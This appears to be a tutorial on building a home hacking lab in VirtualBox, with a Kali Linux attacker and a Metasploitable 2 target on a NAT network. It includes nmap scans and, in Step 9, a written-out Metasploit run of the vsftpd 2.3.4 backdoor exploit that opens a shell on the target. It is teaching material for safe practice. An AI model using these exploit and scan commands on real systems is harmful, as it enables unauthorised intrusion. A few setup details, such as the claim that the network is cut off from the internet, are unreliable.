A home hacking lab is your private playground for learning security tools without risking anyone’s systems. You’ll have vulnerable machines to attack, networks to compromise, and tools to practice on — all safely isolated on your computer. This guide walks you through building a complete lab using VirtualBox (free) and open-source operating systems.
Why Build a Home Lab?
- Learn without consequences: No risk to production systems
- Practice at your own pace: No time pressure or external deadlines
- Test exploits safely: Understand how attacks work before certification exams
- Experiment with tools: Deploy Metasploit, Nmap, Burp Suite on real targets
- Build reusable scenarios: Save and restore lab snapshots for repeated practice
Hardware Requirements
Minimum specs for a functional lab:
- CPU: Dual-core processor (modern quad-core recommended)
- RAM: 8GB minimum (16GB strongly recommended for multiple VMs)
- Storage: 100GB free disk space (SSD is much faster)
- Network: Stable internet connection for downloading ISOs
Step 1: Install VirtualBox
VirtualBox is a free hypervisor that lets you run multiple operating systems on one computer.
Download:
Visit https://www.virtualbox.org/wiki/Downloads and download for your operating system (Windows, macOS, Linux).
Installation:
Windows:
1. Run the installer (VirtualBox-x.x.x-Win.exe)
2. Follow the wizard (use default settings)
3. Accept driver installation prompts
4. Restart when prompted
macOS:
1. Mount the DMG file
2. Run VirtualBox.pkg
3. Follow the installer
4. Grant Homebrew permissions if using Homebrew
Linux (Debian/Ubuntu):
sudo apt update
sudo apt install virtualbox
# Add user to vboxusers group
sudo usermod -aG vboxusers $USER
# Log out and back in
Verify installation:
VBoxManage --version
Before creating VMs, understand the network setup:
Lab Network Architecture:
Host Machine (Your Computer)
├── NAT Network: 10.0.2.0/24 (isolated)
│ ├── Kali Linux (attacker): 10.0.2.4
│ └── Metasploitable (target): 10.0.2.5
└── Host-only Adapter (backup connection)
Create a NAT Network in VirtualBox:
- Open VirtualBox
- File → Preferences → Network
- Click NatNetworks tab
- Click Create (green plus icon)
- Default name:
NatNetwork
- Default network:
10.0.2.0/24
- Check “Support DHCP”
- Click OK
This network is isolated from your host machine and the internet — perfect for safe testing.
Step 3: Download Operating System ISOs
Kali Linux (Attacker Machine):
Download from https://www.kali.org/get-kali/
Choose Installer or Live USB version. For a VM, download the ISO (not USB image).
Typical filename: kali-linux-2024.x-installer-amd64.iso (~3.2 GB)
Metasploitable 2 (Vulnerable Target):
Download from https://sourceforge.net/projects/metasploitable/files/
Filename: metasploitable-linux-2.0.0.iso (~737 MB)
Alternative: DVWA (PHP/MySQL vulnerable app) or WebGoat (Java-based).
Store both ISO files in a dedicated folder: /home/user/VirtualBox-ISOs/
Step 4: Create Kali Linux Virtual Machine
Open VirtualBox and click “New”:
| Setting | Value |
|---|
| Name | Kali-Linux-Main |
| Machine Folder | Default |
| ISO Image | (Select Kali ISO) |
| OS Type | Linux |
| Version | Debian (64-bit) |
| Memory | 3072 MB (3GB minimum, 4GB better) |
| Disk | 30 GB (dynamic allocation) |
Continue through the wizard:
- Accept defaults for processor allocation (2-4 cores)
- Create virtual hard disk (30 GB, VDI format)
- Click Finish
Configure Network:
- Right-click the Kali VM → Settings
- Go to Network tab
- Adapter 1:
- Attached to:
NAT Network
- Name:
NatNetwork
- Click OK
Start the VM:
- Double-click Kali-Linux-Main
- Complete Kali installation (English, defaults, set root password)
- Installation takes 10-15 minutes
After installation, boot into Kali and verify network:
ip addr show
# Should show eth0 with IP like 10.0.2.4
Create a new VM:
| Setting | Value |
|---|
| Name | Metasploitable-Target |
| ISO Image | (Select Metasploitable ISO) |
| Memory | 512 MB minimum |
| Disk | 8 GB |
Configure Network:
- Settings → Network
- Adapter 1: NAT Network, same as Kali
- Click OK
Start the VM:
- Boot from ISO
- Metasploitable will boot to a login prompt
- Default credentials:
msfadmin / msfadmin
Verify network:
ifconfig
# Should show eth0 with IP like 10.0.2.5
Test connectivity from Kali:
ping 10.0.2.5
# Should get responses
Step 6: Verify Lab Connectivity
On Kali, test the network:
# Test DNS
nslookup google.com
# Test connectivity to Metasploitable
nmap -sn 10.0.2.0/24
# Scan Metasploitable ports
nmap -p- 10.0.2.5
Expected Metasploitable open ports: 21 (FTP), 22 (SSH), 23 (Telnet), 25 (SMTP), 53 (DNS), 80 (HTTP), 111 (RPC), 139 (Samba), 445 (SMB), 512-514 (rsh), 1099 (Java RMI), 1524 (ingreslock), 2049 (NFS), 3306 (MySQL), 5432 (PostgreSQL), 5900 (VNC), 6667 (IRC), 8009 (Apache Jserv), 8180 (Tomcat), 27374 (BackOrifice), 31337 (BackOrifice), others.
If you see ports, your lab is working.
Kali comes with most tools pre-installed, but update everything:
sudo apt update
sudo apt upgrade -y
Verify key tools are installed:
# Metasploit Framework
msfconsole --version
# Nmap
nmap --version
# Burp Suite (Community Edition)
burpsuite &
# Wireshark
wireshark &
If any are missing:
# Install Metasploit
sudo apt install metasploit-framework
# Install Burp Suite
sudo apt install burpsuite
Step 8: Create Snapshots (Critical!)
Snapshots let you save machine states and revert to them after an attack. This is invaluable for repeated practice.
Create a Metasploitable snapshot before attacking:
- Right-click Metasploitable-Target → Snapshots
- Click Take Snapshot
- Name:
Clean State
- Description:
Fresh Metasploitable, all services running
- Click OK
After you compromise it, revert:
- Snapshots → Restore Snapshot
- Choose
Clean State
- Click Restore
Machine is back to its original state in seconds.
Step 9: First Real Attack
Now test the lab with a real exploit:
On Kali:
# Start Metasploit
msfconsole
# Search for a Metasploitable exploit
search vsftpd
# Use the VSFTPD exploit
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.0.2.5
set LHOST 10.0.2.4
run
If successful, you’ll get a shell on Metasploitable. This confirms:
- Network connectivity works
- Metasploit is functional
- Vulnerable service is running
- Your lab is ready for serious learning
Expanding Your Lab
Add more machines:
- DVWA (Docker-based web vulnerabilities)
- WebGoat (OWASP’s purposefully insecure application)
- FuxSec (Linux with multiple vulnerable services)
- HackTheBox machines (VirtualBox versions)
Networking expansion:
Create multiple NAT networks to simulate:
- DMZ (screened subnet)
- Internal network
- Database tier
Internet
↓
Firewall
↓
DMZ (Web servers) ← 10.0.2.0/24
↓
Internal (Workstations, Domain controllers) ← 10.0.3.0/24
↓
Database (PostgreSQL, MySQL) ← 10.0.4.0/24
Best Practices
- Keep backups: Export VM configs regularly
- Document everything: Log what you’ve learned and tested
- Use snapshots aggressively: Before major changes
- Monitor resources: Use VirtualBox performance monitoring
- Stay organized: Clear naming conventions (purpose-os-date)
- Practice regularly: 15-30 minutes daily beats weekend cramming
- Scale gradually: Add complexity as your skills grow
Troubleshooting
VMs can’t communicate:
- Check both are on same NAT Network
- Run
ip addr show (Kali) and ifconfig (Metasploitable)
- Both should be in 10.0.2.0/24 range
Kali has no internet:
- Add second network adapter: Settings → Network → Adapter 2
- Set to “NAT” (not NAT Network)
Metasploitable SSH hanging:
- Normal for older Kali versions, use other services
- Or upgrade Metasploitable to Metasploitable 3
Conclusion
You now have a complete, isolated hacking lab. This is your secure space to learn every tool in the security toolkit. Take full advantage — compromise machines, analyze traffic, craft payloads, break things. Everything here is yours to learn from.
Your home lab is your cybersecurity gymnasium. Use it relentlessly.